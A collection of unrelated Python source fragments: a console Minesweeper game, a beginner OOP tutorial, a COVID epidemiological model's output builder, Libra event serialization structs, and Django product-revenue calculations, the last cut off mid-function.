            if userField[y][x] == "f":
                # clearing a flagged (non-bomb) cell removes the flag
                flags.remove([x,y])
                userField[y][x] = field[y][x]
                printUserField()
                checkFlags()
            elif field[y][x] == 0:
                # reveal contiguous spaces
                zerosRevealed.append([x,y])
                checkZeroes()
                printUserField()
                choose()
            else:
                userField[y][x] = field[y][x]
                # check flags even when clearing because if the last space on the board is revealed through clear, and the flags are more than the number of bombs, then checkFlags needs to be called in order to issue warning statement
                printUserField()
                checkFlags()
# Show the player's view of the board (the sentinel border is hidden).
def printUserField():
    """Print the visible board, one space-separated row per line."""
    global w
    global h
    global b
    for row in range(1, h-1):
        for col in range(1, w-1):
            print(userField[row][col], end=" ")
        print("")
# while loop saying while whole board is not filled, do this action, and when it is full, check to see if the flags are over bombs
# GAME OVER! Don't get second chance...
def gameOver():
    """Announce that the player cleared a bomb, ending the game."""
    message = "Sorry, you just unearthed a bomb!"
    print(message)
# check if the flags are all correct
def checkFlags():
    """Decide whether the game is won, warn about over-flagging, and
    otherwise hand control back to choose().

    Win conditions checked: (a) every non-bomb cell revealed, or (b) the
    number of flags equals b and every flag sits on a bomb.
    """
    global numRevealed
    global correctFlags
    global w
    global h
    global b
    # tell the user if they have revealed the entire board, but have too many flags, that they need to keep going
    if len(flags) > b:
        for y in range(1,h-1):
            for x in range(1,w-1):
                if userField[y][x] != "X":
                    numRevealed += 1
        if numRevealed == (w-2)*(h-2):
            print("Uh oh! Looks like you flagged some spaces that aren't bombs. Keep going!")
        # reset the number revealed variable
        numRevealed = 0
    # count revealed cells, excluding flags (flagged non-bombs abort the
    # inner row scan)
    # NOTE(review): this 'break' only exits the inner x-loop, so later rows
    # are still counted -- confirm this matches the intended rule
    for y in range(1,h-1):
        for x in range(1,w-1):
            if userField[y][x] != "X":
                if userField[y][x] == "f" and field[y][x] != "*":
                    break
                numRevealed += 1
                if userField[y][x] == "f":
                    numRevealed -= 1
    if numRevealed == (w-2)*(h-2) - b:
        win()
    numRevealed = 0
    # only useful to check if flags are in the right place if the number of flags = bombs
    if len(flags) == b:
        for i in range(b):
            if userField[bombs[i][1]][bombs[i][0]] == "f":
                correctFlags += 1
        if correctFlags == b:
            win()
        else:
            choose()
    else:
        choose()
    # needs to reupdate itself each time
    correctFlags = 0
# YOU WON! Play again or not.
def win():
    """Congratulate the player and optionally restart with a fresh board."""
    # bug fix: the original assigned field/userField as locals, so the
    # replayed game silently reused the old board (and old bombs/flags);
    # rebind the module-level state and clear the per-game lists instead
    global field, userField
    playAgain = input("Yay! You won! You just swept the mines like a champ.\nWould you like to play again? Answer 'Y' or 'N'")
    if playAgain == 'Y':
        flags.clear()
        bombs.clear()
        zerosRevealed.clear()
        field = [[0]*w for x in range(h)]
        userField = [["X"]*w for x in range(h)]
        start()
    else:
        print("Goodbye!")
# check the zeros for contiguous and revealing
def checkZeroes():
    """Flood-fill reveal: for each queued zero cell, reveal all eight
    neighbors and queue any newly found in-bounds zeros."""
    global numRevealed
    global w
    global h
    global b
    while zerosRevealed:
        originaly = zerosRevealed[0][1]
        originalx = zerosRevealed[0][0]
        zerosRevealed.remove(zerosRevealed[0])
        for y in range(originaly-1,originaly+2):
            for x in range(originalx-1,originalx+2):
                # NOTE(review): field[y][x] is read before the bounds check
                # below, so border (sentinel) cells are accessed -- safe only
                # because the board includes the +2 border; confirm
                if field[y][x] == 0 and userField[y][x] == "X":
                    if y > 0 and y < h-1 and x > 0 and x < w-1:
                        zerosRevealed.append([x,y])
                userField[y][x] = field[y][x]
# start the program (runs immediately on import/execution)
start()
# all previous tutorials have been using
# procedure-oriented programming
# in this section, we'll make classes and do OOP stuff
# Objects can store data using ordinary variables that
# belong to the object. Variables that belong to an object
# or class are referred to as fields. Objects can also have
# functionality by using functions that belong to a class.
# Such functions are called methods of the class.
# This terminology is important because it helps us to
# differentiate between functions and variables which are
# independent and those which belong to a class or object.
# Collectively, the fields and methods can be referred to as
# the attributes of that class.
# Fields are of two types - they can belong to each
# instance/object of the class or they can belong to the class itself.
# They are called instance variables and class variables respectively.
# the 'self' in Python is equivalent to the 'this' reference in C# and Java
class Person:
    """An empty example class, used only to demonstrate object creation."""
    pass
# Instantiate the empty class and show its default repr.
p = Person()
print(p)
# Example output (Python 3 prints "object"; the old "instance at ..." form was Python 2):
# <__main__.Person object at 0x10171f518>
print()
class Robot:
    """A robot with a name; the class itself tracks how many robots exist."""

    # Class variable shared by every instance: the current robot count.
    population = 0

    def __init__(self, name):
        """Store the robot's name and add it to the population count."""
        self.name = name
        print("(Initializing {})".format(self.name))
        # Each construction bumps the shared counter.
        Robot.population = Robot.population + 1

    def die(self):
        """Remove this robot from the population and report the loss."""
        print("{} is being destroyed!".format(self.name))
        Robot.population = Robot.population - 1
        if Robot.population:
            print("There are still {:d} robots working.".format(
                Robot.population))
        else:
            print("{} was the last one.".format(self.name))

    def say_hi(self):
        """Print a short greeting that includes the robot's name."""
        print("Greetings, my masters call me {}.".format(self.name))

    @classmethod
    def how_many(cls):
        """Report the current robot population (a class-level query)."""
        print("We have {:d} robots.".format(cls.population))
# Create two robots; each construction increments Robot.population.
droid1 = Robot("R2-D2")
droid1.say_hi()
Robot.how_many()
droid2 = Robot("C-3PO")
droid2.say_hi()
Robot.how_many()
print("\nRobots can do some work here.\n")
print("Robots have finished their work. So let's destroy them.")
# Destroying each robot decrements the shared population counter.
droid1.die()
droid2.die()
Robot.how_many()
# (Inheritance and polymorphism are covered in later OOP examples.)
|
from typing import List, Dict, Optional, Union
import numpy as np
from jax import scipy as scipy
from jax import numpy as jnp
from autumn.model_features.outputs import OutputsBuilder
from autumn.model_features.agegroup import convert_param_agegroups
from autumn.models.sm_covid2.parameters import TimeDistribution, VocComponent, AgeSpecificProps
from .constants import IMMUNITY_STRATA, Compartment, ImmunityStratum
from autumn.core.utils.utils import weighted_average
from autumn.models.sm_jax.outputs import apply_odds_ratio_to_proportion
from summer2.parameters import Function, Data, DerivedOutput
def gamma_cdf(shape, scale, x):
    """Cumulative distribution function of a gamma(shape, scale) variable, evaluated at x."""
    scaled_x = x / scale
    return scipy.special.gammainc(shape, scaled_x)
def get_immunity_prop_modifiers(
    source_pop_immunity_dist: Dict[str, float],
    source_pop_protection: Dict[str, float],
):
    """
    Adjust the age-specific hospitalisation/mortality rates for pre-existing immunity protection.

    The final parameters are scaled so that the population-weighted average effect matches the
    source estimate (e.g. Nyberg et al.), while acknowledging that vaccine-related immunity was
    present in the source population across the modelled immunity strata.

    Args:
        source_pop_immunity_dist: Proportion of the source population in each immunity stratum
        source_pop_protection: Protection against the outcome conferred by each stratum
    Returns:
        The multipliers for the age-specific proportions for each of the immunity strata
    """
    # Residual (unprotected) risk for each stratum is the complement of the protection
    immunity_effect = {stratum: 1.0 - protection for stratum, protection in source_pop_protection.items()}
    # Population-weighted residual risk across the strata
    weighted_residual = sum(
        immunity_effect[stratum] * source_pop_immunity_dist[stratum] for stratum in IMMUNITY_STRATA
    )
    no_immunity_modifier = 1.0 / weighted_residual
    immune_modifiers = {
        stratum: no_immunity_modifier * immunity_effect[stratum] for stratum in IMMUNITY_STRATA
    }
    # Sanity check that the modifiers do produce a weighted average of one
    msg = "Values used don't appear to create a weighted average with weights summing to one, something went wrong"
    assert weighted_average(immune_modifiers, source_pop_immunity_dist, rounding=4) == 1.0, msg
    return immune_modifiers
class SmCovidOutputsBuilder(OutputsBuilder):
    """
    Registers the sm_covid2 model's derived outputs (incidence, deaths, hospitalisations,
    seroprevalence, immunity proportions, etc.) on the underlying summer2 model.

    Stratified output names follow the pattern
    ``<base>Xagegroup_<a>Ximmunity_<i>Xstrain_<s>``; delayed outcomes (deaths, admissions)
    are computed by convolving incidence-derived series with pre-computed gamma interval
    densities.
    """
    def request_incidence(
        self,
        age_groups: List[str],
        strain_strata: List[str],
        incidence_flow: str,
        request_incidence_by_age: bool,
    ):
        """
        Calculate incident disease cases. This is associated with the transition to infectiousness if there is only one
        infectious compartment, or transition between the two if there are two.
        Note that this differs from the approach in the covid_19 model, which took entry to the first "active"
        compartment to represent the onset of symptoms, which infectiousness starting before this.
        Args:
            age_groups: The modelled age groups
            strain_strata: The modelled strains
            incidence_flow: The name of the flow representing incident cases
            request_incidence_by_age: Whether to save outputs for incidence by age
        """
        # Unstratified
        self.model.request_output_for_flow(name="incidence", flow_name=incidence_flow)
        # Stratified
        for agegroup in age_groups:
            agegroup_string = f"Xagegroup_{agegroup}"
            age_incidence_sources = []
            for immunity_stratum in IMMUNITY_STRATA:
                immunity_string = f"Ximmunity_{immunity_stratum}"
                for strain in strain_strata:
                    strain_string = f"Xstrain_{strain}" if strain else ""
                    strain_filter = {"strain": strain} if strain else {}
                    dest_filter = {"agegroup": agegroup, "immunity": immunity_stratum}
                    dest_filter.update(strain_filter)
                    output_name = f"incidence{agegroup_string}{immunity_string}{strain_string}"
                    age_incidence_sources.append(output_name)
                    self.model.request_output_for_flow(
                        name=output_name,
                        flow_name=incidence_flow,
                        dest_strata=dest_filter,
                        save_results=False,
                    )
            # Aggregated incidence by age
            if request_incidence_by_age:
                self.model.request_aggregate_output(
                    name=f"incidence{agegroup_string}",
                    sources=age_incidence_sources,
                    save_results=True,
                )
    def request_infection_deaths(
        self,
        model_times: np.ndarray,
        age_groups: List[str],
        strain_strata: List[str],
        iso3: str,
        region: Union[str, None],
        ifr_prop_requests: AgeSpecificProps,
        ve_death: float,
        time_from_onset_to_death: TimeDistribution,
        voc_params: Optional[Dict[str, VocComponent]],
    ):
        """
        Request infection death-related outputs.
        Args:
            model_times: The model evaluation times
            age_groups: Modelled age group lower breakpoints
            strain_strata: The modelled strains
            iso3: The ISO3 code of the country being simulated
            region: The sub-region being simulated, if any
            ifr_prop_requests: All the CFR-related requests, including the proportions themselves
            ve_death: Vaccine efficacy against mortality
            time_from_onset_to_death: Details of the statistical distribution for the time to death
            voc_params: The strain-specific parameters
        """
        ifr_request = ifr_prop_requests.values
        age_ifr_props = Data(
            np.array(convert_param_agegroups(iso3, region, ifr_request, age_groups))
        )
        ifr_multiplier = ifr_prop_requests.multiplier
        # Pre-compute the probabilities of event occurrence within each time interval between model times
        # death_distri_densities = Data(
        #     precompute_density_intervals(time_from_onset_to_death, model_times)
        # )
        death_distri_densities = build_density_interval_func(time_from_onset_to_death, model_times)
        # Prepare immunity modifiers
        immune_death_modifiers = {
            ImmunityStratum.UNVACCINATED: 1.0,
            ImmunityStratum.VACCINATED: 1.0 - ve_death,
        }
        # Request infection deaths for each age group
        infection_deaths_sources = []
        for age_idx, agegroup in enumerate(age_groups):
            agegroup_string = f"Xagegroup_{agegroup}"
            for immunity_stratum in IMMUNITY_STRATA:
                immunity_string = f"Ximmunity_{immunity_stratum}"
                # Adjust CFR proportions for immunity
                age_immune_death_props = age_ifr_props * immune_death_modifiers[immunity_stratum]
                for strain in strain_strata:
                    strain_string = f"Xstrain_{strain}" if strain else ""
                    # Find the strata we are working with and work out the strings to refer to
                    strata_string = f"{agegroup_string}{immunity_string}{strain_string}"
                    output_name = f"infection_deaths{strata_string}"
                    infection_deaths_sources.append(output_name)
                    # Calculate the multiplier based on age, immunity and strain
                    strain_risk_modifier = (
                        1.0 if not strain else voc_params[strain].death_risk_adjuster
                    )
                    death_risk = (
                        age_immune_death_props[age_idx] * strain_risk_modifier * ifr_multiplier
                    )
                    death_risk.node_name = f"death_risk{strata_string}"
                    # infection_deaths_func = Function(
                    #     convolve_probability,
                    #     [
                    #         death_risk * DerivedOutput(f"incidence{strata_string}"),
                    #         death_distri_densities,
                    #     ],
                    # )
                    # Request the output
                    self.model.request_function_output(
                        name=output_name,
                        func=death_risk * DerivedOutput(f"incidence{strata_string}"),
                        save_results=False,
                    )
        # Request aggregated infection deaths
        # NOTE: the onset-to-death convolution is applied once to the aggregate
        # (below) rather than per stratum, which is equivalent because the same
        # delay distribution applies to every stratum.
        self.model.request_aggregate_output(
            name="infection_deaths_preconv", sources=infection_deaths_sources, save_results=False
        )
        infection_deaths_func = Function(
            convolve_probability,
            [
                DerivedOutput("infection_deaths_preconv"),
                death_distri_densities,
            ],
        )
        self.model.request_function_output(
            name="infection_deaths",
            func=infection_deaths_func,
        )
    def request_hospitalisations(
        self,
        model_times: np.ndarray,
        age_groups: List[int],
        strain_strata: List[str],
        iso3: str,
        region: Union[str, None],
        symptomatic_prop_requests: Dict[str, float],
        hosp_prop_requests: AgeSpecificProps,
        ve_hospitalisation: float,
        time_from_onset_to_hospitalisation: TimeDistribution,
        hospital_stay_duration: TimeDistribution,
        voc_params: Optional[Dict[str, VocComponent]],
    ):
        """
        Request hospitalisation-related outputs.
        Args:
            model_times: The model evaluation times
            age_groups: Modelled age group lower breakpoints
            strain_strata: The names of the strains being implemented (or a list of an empty string if no strains)
            iso3: The ISO3 code of the country being simulated
            region: The sub-region being simulated, if any
            symptomatic_prop_requests: The symptomatic proportions by age
            hosp_prop_requests: The hospitalisation proportions given symptomatic infection
            ve_hospitalisation: Vaccine efficacy against hospitalisation
            time_from_onset_to_hospitalisation: Details of the statistical distribution for the time to hospitalisation
            hospital_stay_duration: Details of the statistical distribution for hospitalisation stay duration
            voc_params: The parameters pertaining to the VoCs being implemented in the model
        """
        symptomatic_props = convert_param_agegroups(
            iso3, region, symptomatic_prop_requests, age_groups
        )
        hosp_props = Data(
            np.array(convert_param_agegroups(iso3, region, hosp_prop_requests.values, age_groups))
        )
        # Get the adjustments to the hospitalisation rates according to immunity status
        # or_adjuster_func = get_apply_odds_ratio_to_prop(hosp_prop_requests.multiplier)
        # Prepare immunity modifiers
        immune_hosp_modifiers = {
            ImmunityStratum.UNVACCINATED: 1.0,
            ImmunityStratum.VACCINATED: 1.0 - ve_hospitalisation,
        }
        # Pre-compute the probabilities of event occurrence within each time interval between model times
        hospitalisation_density_intervals = build_density_interval_func(
            time_from_onset_to_hospitalisation, model_times
        )
        # Request hospital admissions for each age group
        hospital_admissions_sources = []
        for agegroup_idx, agegroup in enumerate(age_groups):
            agegroup_string = f"Xagegroup_{agegroup}"
            for immunity_stratum in IMMUNITY_STRATA:
                immunity_string = f"Ximmunity_{immunity_stratum}"
                # Adjust the hospitalisation proportions for immunity
                adj_hosp_props = hosp_props * immune_hosp_modifiers[immunity_stratum]
                # adj_hosp_props = adj_hosp_props.apply(or_adjuster_func)
                adj_hosp_props = Function(
                    apply_odds_ratio_to_proportion, [adj_hosp_props, hosp_prop_requests.multiplier]
                )
                for strain in strain_strata:
                    strain_string = f"Xstrain_{strain}" if strain else ""
                    # Find the strata we are working with and work out the strings to refer to
                    strata_string = f"{agegroup_string}{immunity_string}{strain_string}"
                    output_name = f"hospital_admissions{strata_string}"
                    hospital_admissions_sources.append(output_name)
                    # Calculate the multiplier based on age, immunity and strain
                    strain_risk_modifier = (
                        1.0 if not strain else voc_params[strain].hosp_risk_adjuster
                    )
                    hospital_risk_given_symptoms = (
                        adj_hosp_props[agegroup_idx] * strain_risk_modifier
                    )
                    hospital_risk_given_infection = (
                        hospital_risk_given_symptoms * symptomatic_props[agegroup]
                    )
                    # Get the hospitalisation function
                    # hospital_admissions_func = make_calc_admissions_func(
                    #     hospital_risk_given_infection, interval_distri_densities
                    # )
                    # hospital_admissions_func = Function(
                    #     convolve_probability,
                    #     [
                    #         hospital_risk_given_infection
                    #         * DerivedOutput(f"incidence{strata_string}"),
                    #         hospitalisation_density_intervals,
                    #     ],
                    # )
                    # Request the output
                    self.model.request_function_output(
                        name=output_name,
                        func=hospital_risk_given_infection
                        * DerivedOutput(f"incidence{strata_string}"),
                        save_results=False,
                    )
        # Request aggregated hospital admissions
        self.model.request_aggregate_output(
            name="hospital_admissions_preconv",
            sources=hospital_admissions_sources,
            save_results=False,
        )
        hospital_admissions_func = Function(
            convolve_probability,
            [
                DerivedOutput("hospital_admissions_preconv"),
                hospitalisation_density_intervals,
            ],
        )
        self.model.request_function_output(
            name="hospital_admissions",
            func=hospital_admissions_func,
            save_results=True,
        )
        # Request aggregated hospital occupancy
        probas_stay_greater_than = build_probas_stay_func(hospital_stay_duration, model_times)
        # hospital_occupancy_func = make_calc_occupancy_func(probas_stay_greater_than)
        hospital_occupancy_func = Function(
            convolve_probability,
            [
                DerivedOutput("hospital_admissions"),
                probas_stay_greater_than,
            ],
        )
        self.model.request_function_output(
            name="hospital_occupancy", func=hospital_occupancy_func
        )
    def request_peak_hospital_occupancy(self):
        """
        Create an output for the peak hospital occupancy. This is stored as a timeseries, although this is
        actually a constant output.
        """
        # Broadcast the scalar maximum across the whole time dimension so the
        # constant can be stored like any other timeseries output.
        def array_max(x):
            return jnp.repeat(jnp.max(x), jnp.size(x))
        peak_func = Function(array_max, [DerivedOutput("hospital_occupancy")])
        self.model.request_function_output(
            "peak_hospital_occupancy",
            func=peak_func
        )
    # def request_icu_outputs(
    #     self,
    #     prop_icu_among_hospitalised: float,
    #     time_from_hospitalisation_to_icu: TimeDistribution,
    #     icu_stay_duration: TimeDistribution,
    #     strain_strata: List[str],
    #     model_times: np.ndarray,
    #     voc_params: Optional[Dict[str, VocComponent]],
    #     age_groups: List[int],
    # ):
    #     """
    #     Request ICU-related outputs.
    #     Args:
    #         prop_icu_among_hospitalised: Proportion ever requiring ICU stay among hospitalised cases (float)
    #         time_from_hospitalisation_to_icu: Details of the statistical distribution for the time to ICU admission
    #         icu_stay_duration: Details of the statistical distribution for ICU stay duration
    #         strain_strata: The names of the strains being implemented (or a list of an empty string if no strains)
    #         model_times: The model evaluation times
    #         voc_params: The parameters pertaining to the VoCs being implemented in the model
    #         age_groups: Modelled age group lower breakpoints
    #     """
    #     # Pre-compute the probabilities of event occurrence within each time interval between model times
    #     interval_distri_densities = precompute_density_intervals(time_from_hospitalisation_to_icu, model_times)
    #     icu_admissions_sources = []
    #     for agegroup in age_groups:
    #         agegroup_string = f"Xagegroup_{agegroup}"
    #         for immunity_stratum in IMMUNITY_STRATA:
    #             immunity_string = f"Ximmunity_{immunity_stratum}"
    #             for strain in strain_strata:
    #                 strain_string = f"Xstrain_{strain}" if strain else ""
    #                 strata_string = f"{agegroup_string}{immunity_string}{strain_string}"
    #                 output_name = f"icu_admissions{strata_string}"
    #                 icu_admissions_sources.append(output_name)
    #                 # Calculate the multiplier based on age, immunity and strain
    #                 strain_risk_modifier = 1. if not strain else voc_params[strain].icu_multiplier
    #                 icu_risk = prop_icu_among_hospitalised * strain_risk_modifier
    #                 # Request ICU admissions
    #                 icu_admissions_func = make_calc_admissions_func(icu_risk, interval_distri_densities)
    #                 self.model.request_function_output(
    #                     name=output_name,
    #                     sources=[f"hospital_admissions{strata_string}"],
    #                     func=icu_admissions_func,
    #                     save_results=False,
    #                 )
    #     # Request aggregated icu admissions
    #     self.model.request_aggregate_output(
    #         name="icu_admissions",
    #         sources=icu_admissions_sources,
    #     )
    #     # Request ICU occupancy
    #     probas_stay_greater_than = precompute_probas_stay_greater_than(icu_stay_duration, model_times)
    #     icu_occupancy_func = make_calc_occupancy_func(probas_stay_greater_than)
    #     self.model.request_function_output(
    #         name="icu_occupancy",
    #         sources=["icu_admissions"],
    #         func=icu_occupancy_func,
    #     )
    def request_recovered_proportion(self, base_comps: List[str]):
        """
        Track the total population ever infected and the proportion of the total population.
        Args:
            base_comps: The unstratified model compartments
        """
        # All the compartments other than the fully susceptible have been infected at least once
        ever_infected_compartments = [
            comp for comp in base_comps if comp != Compartment.SUSCEPTIBLE
        ]
        self.model.request_output_for_compartments(
            "ever_infected",
            ever_infected_compartments,
        )
        self.model.request_function_output(
            "prop_ever_infected",
            func=DerivedOutput("ever_infected") / DerivedOutput("total_population")
        )
    def request_age_matched_recovered_proportion(self, base_comps: List[str], age_groups: List[str], sero_age_min, sero_age_max):
        """
        Track the proportion ever infected within the age range covered by a serosurvey, so that
        the modelled seroprevalence can be compared against the survey estimate.
        Args:
            base_comps: The unstratified model compartments
            age_groups: The modelled age group lower breakpoints
            sero_age_min: Lower age bound of the serosurvey (None for no lower bound)
            sero_age_max: Upper age bound of the serosurvey (None for no upper bound)
        """
        # if no age restriction in the survey, just copy the overall sero-prevalence
        if sero_age_min is None and sero_age_max is None:
            self.model.request_aggregate_output(
                "prop_ever_infected_age_matched",
                sources =[DerivedOutput("prop_ever_infected")]
            )
        # otherwise, we need to workout out the matching modelled age bands and create the relevant output
        else:
            # All the compartments other than the fully susceptible have been infected at least once
            ever_infected_compartments = [
                comp for comp in base_comps if comp != Compartment.SUSCEPTIBLE
            ]
            # Work out the modelled age_bands to be included
            if sero_age_min is not None: # find the largest lower bound that is smaller than or equal to sero_age_min
                youngest_model_agegroup = max([int(age) for age in age_groups if int(age) <= sero_age_min])
            else:
                youngest_model_agegroup = 0
            if sero_age_max is not None:
                oldest_model_agegroup = max([int(age) for age in age_groups if int(age) < sero_age_max])
            else:
                oldest_model_agegroup = max([int(age) for age in age_groups])
            included_age_strats = [age for age in age_groups if youngest_model_agegroup <= int(age) and int(age) <= oldest_model_agegroup]
            # Loop through all included age groups to calculate their respective number of recovered and popsize
            infected_output_names = []
            total_pop_output_names = []
            for age_strat in included_age_strats:
                this_infected_output = f"ever_infected_age_{age_strat}"
                this_total_pop_output = f"total_pop_age_{age_strat}"
                age_strata_filter = {"agegroup": age_strat}
                self.model.request_output_for_compartments(
                    this_infected_output,
                    compartments=ever_infected_compartments,
                    strata=age_strata_filter,
                    save_results=False
                )
                infected_output_names.append(this_infected_output)
                self.model.request_output_for_compartments(
                    this_total_pop_output,
                    compartments=base_comps,
                    strata=age_strata_filter,
                    save_results=False
                )
                total_pop_output_names.append(this_total_pop_output)
            self.model.request_aggregate_output(
                "ever_infected_age_matched",
                sources=infected_output_names,
                save_results=False
            )
            self.model.request_aggregate_output(
                "total_population_age_matched",
                sources=total_pop_output_names,
                save_results=False
            )
            self.model.request_function_output(
                "prop_ever_infected_age_matched",
                func=DerivedOutput("ever_infected_age_matched") / DerivedOutput("total_population_age_matched")
            )
    def request_random_process_outputs(
        self,
    ):
        """Track the transformed random process as a derived output."""
        self.model.request_computed_value_output("transformed_random_process")
    def request_immunity_props(self, immunity_strata, age_pops, request_immune_prop_by_age):
        """
        Track population distribution across immunity stratification, to make sure vaccination stratification is working
        correctly.
        Args:
            immunity_strata: Immunity strata being implemented in the model
            age_pops: Population size by age group
            request_immune_prop_by_age: Whether to request age-specific immunity proportions
        """
        for immunity_stratum in immunity_strata:
            n_immune_name = f"n_immune_{immunity_stratum}"
            prop_immune_name = f"prop_immune_{immunity_stratum}"
            self.model.request_output_for_compartments(
                n_immune_name,
                self.compartments,
                {"immunity": immunity_stratum},
            )
            self.model.request_function_output(
                prop_immune_name,
                func=DerivedOutput(n_immune_name) / DerivedOutput("total_population")
            )
            # Calculate age-specific proportions if requested
            if request_immune_prop_by_age:
                for agegroup, popsize in age_pops.items():
                    n_age_immune_name = f"n_immune_{immunity_stratum}Xagegroup_{agegroup}"
                    prop_age_immune_name = f"prop_immune_{immunity_stratum}Xagegroup_{agegroup}"
                    self.model.request_output_for_compartments(
                        n_age_immune_name,
                        self.compartments,
                        {"immunity": immunity_stratum, "agegroup": agegroup},
                        save_results=False,
                    )
                    self.model.request_function_output(
                        prop_age_immune_name,
                        func=make_age_immune_prop_func(popsize)(DerivedOutput(n_age_immune_name))
                    )
    def request_cumulative_outputs(self, requested_cumulative_outputs, cumulative_start_time):
        """
        Compute cumulative outputs for requested outputs.
        Args:
            requested_cumulative_outputs: List of requested derived outputs to accumulate
            cumulative_start_time: reference time for cumulative output calculation
        """
        for output in requested_cumulative_outputs:
            self.model.request_cumulative_output(
                name=f"cumulative_{output}", source=output, start_time=cumulative_start_time
            )
    def request_student_weeks_missed_output(self, n_student_weeks_missed):
        """
        Store the number of students*weeks of school missed. This is a single float that will be stored as a derived output
        """
        # Broadcast the scalar across the time dimension (sized from an existing output).
        def repeat_val(example_output, n_student_weeks_missed):
            return jnp.repeat(n_student_weeks_missed, jnp.size(example_output))
        student_weeks_missed_func = Function(repeat_val, [DerivedOutput("total_population"), n_student_weeks_missed])
        self.model.request_function_output(
            "student_weeks_missed",
            func=student_weeks_missed_func
        )
def build_statistical_distribution(distribution_details: TimeDistribution):
    """
    Generate a scipy statistical distribution object that can then be used multiple times to evaluate the cdf
    Args:
        distribution_details: User request parameters that define the distribution
    Returns:
        A scipy statistical distribution object
    Raises:
        ValueError: If the requested distribution type is not supported
    """
    from scipy import stats
    if distribution_details.distribution == "gamma":
        shape = distribution_details.parameters["shape"]
        # The request is parameterised by mean, so scale = mean / shape
        scale = distribution_details.parameters["mean"] / shape
        return stats.gamma(a=shape, scale=scale)
    # Previously fell through and returned None, deferring the failure to the
    # caller as an obscure AttributeError; fail fast with a clear message.
    raise ValueError(
        f"Unsupported distribution type: {distribution_details.distribution}"
    )
def build_density_interval_func(dist: TimeDistribution, model_times):
    """
    Build a graph Function giving the probability mass of the delay distribution
    associated with each time lag between consecutive model times, for use as a
    convolution kernel.
    Args:
        dist: The delay distribution request (assumed gamma, parameterised by shape and mean,
            consistent with build_statistical_distribution -- TODO confirm for other types)
        model_times: The model evaluation times
    Returns:
        A summer2 Function evaluating the per-interval densities
    """
    # Time lags relative to the first model time
    lags = Data(model_times - model_times[0])
    shape = dist.shape
    scale = dist.mean / dist.shape
    cdf_values = Function(gamma_cdf, [shape, scale, lags])
    # NOTE(review): jnp.gradient is a central-difference estimate of the density,
    # not the exact CDF increment per interval -- confirm this approximation is intended.
    interval_distri_densities = Function(jnp.gradient, [cdf_values])
    return interval_distri_densities
def build_probas_stay_func(dist: TimeDistribution, model_times):
    """
    Build a graph expression for the probability that a stay (e.g. hospital stay)
    lasts longer than each time lag between model times, i.e. the survival
    function 1 - CDF, for use as an occupancy convolution kernel.
    Args:
        dist: The stay-duration distribution request (assumed gamma, parameterised by
            shape and mean -- TODO confirm for other types)
        model_times: The model evaluation times
    Returns:
        A summer2 graph expression for the survival probabilities
    """
    # Time lags relative to the first model time
    lags = Data(model_times - model_times[0])
    shape = dist.shape
    scale = dist.mean / dist.shape
    cdf_values = Function(gamma_cdf, [shape, scale, lags])
    # Survival function: probability the stay exceeds each lag
    probas_stay_greater_than = 1.0 - cdf_values
    return probas_stay_greater_than
def convolve_probability(source_output, density_kernel):
    """Convolve a time series with a probability density kernel, truncated to the source length."""
    n_points = len(source_output)
    full_convolution = jnp.convolve(source_output, density_kernel)
    return full_convolution[:n_points]
def make_age_immune_prop_func(popsize):
    """
    Build a converter from a count of immune individuals to a proportion of one age group.
    Args:
        popsize: Population size of the relevant age group
    Returns:
        A function converting a number of individuals into the associated proportion among the relevant age group
    """
    def to_proportion(n_immune):
        return n_immune / popsize
    return to_proportion
|
from canoser import *
from libra.hasher import gen_hasher
EVENT_KEY_LENGTH = 32
class EventKey(DelegateT):
    """A fixed-length event key, serialised as EVENT_KEY_LENGTH (32) Uint8 values."""
    delegate_type = [Uint8, EVENT_KEY_LENGTH]
class EventHandle(Struct):
    """Handle to an event stream: how many events have been emitted, and the stream's key."""
    _fields = [
        ('count', Uint64),  # number of events emitted to this handle so far
        ('key', EventKey)   # globally unique key identifying the event stream
    ]
class ContractEvent(Struct):
    """An event emitted during transaction execution, with its key, sequence number and payload."""
    _fields = [
        ('key', EventKey),
        ('sequence_number', Uint64),
        ('event_data', [Uint8])  # raw event payload bytes as a list of ints
    ]
    @classmethod
    def from_proto(cls, proto):
        """Build a ContractEvent from its protobuf representation.

        NOTE(review): bytes_to_int_list is presumably provided by the
        ``from canoser import *`` wildcard -- verify it is exported there.
        """
        ret = cls()
        ret.key = bytes_to_int_list(proto.key)
        ret.sequence_number = proto.sequence_number
        ret.event_data = bytes_to_int_list(proto.event_data)
        return ret
    def hash(self):
        """Return the digest of the canonically serialised event, domain-separated
        with the b"ContractEvent" hasher salt."""
        shazer = gen_hasher(b"ContractEvent")
        shazer.update(self.serialize())
        return shazer.digest()
|
from QualiaII.models import tblVenta, tblSurtido, tblProducto
def calculoInversion(listaProductos):
    """Calculate the purchase investment (cost * units bought) per product.

    Args:
        listaProductos: Iterable of product ids to evaluate
    Returns:
        Dict mapping each product id to the money invested in it
    """
    inversionProductos = {}
    # dict.fromkeys de-duplicates while preserving order, matching the
    # original two-pass dict-based implementation when ids repeat.
    for producto_id in dict.fromkeys(listaProductos):
        # Sum the restock quantities directly; an empty queryset sums to 0,
        # so the previous exists() pre-check (an extra query per product)
        # is unnecessary.
        unidades_compradas = sum(
            surtido.cantidad for surtido in tblSurtido.objects.filter(producto=producto_id)
        )
        producto = tblProducto.objects.get(id=producto_id)
        inversionProductos[producto_id] = producto.costo * unidades_compradas
    return inversionProductos
def calculoGanancia(listaProductos):
    """Calculate the sales revenue (price * units sold) per product.

    Args:
        listaProductos: Iterable of product ids to evaluate
    Returns:
        Dict mapping each product id to the revenue it generated
    """
    gananciaProductos = {}
    # dict.fromkeys de-duplicates while preserving order, matching the
    # original two-pass dict-based implementation when ids repeat.
    for producto_id in dict.fromkeys(listaProductos):
        # Sum the sale quantities directly; an empty queryset sums to 0,
        # removing the redundant exists() pre-check (one query fewer).
        unidades_vendidas = sum(
            venta.cantidad for venta in tblVenta.objects.filter(producto=producto_id)
        )
        producto = tblProducto.objects.get(id=producto_id)
        gananciaProductos[producto_id] = producto.precio * unidades_vendidas
    return gananciaProductos
def calculoInversionAcumulada(listaProductos):
    """Calculate the total money invested across all the given products.

    Args:
        listaProductos: Iterable of product ids to evaluate
    Returns:
        The accumulated investment (sum of cost * units bought over all products)
    """
    inversion = 0
    # dict.fromkeys de-duplicates while preserving order: the original
    # accumulated over a dict keyed by product id, so repeated ids must
    # only be counted once.
    for producto_id in dict.fromkeys(listaProductos):
        # An empty queryset sums to 0, so no exists() pre-check is needed.
        unidades_compradas = sum(
            surtido.cantidad for surtido in tblSurtido.objects.filter(producto=producto_id)
        )
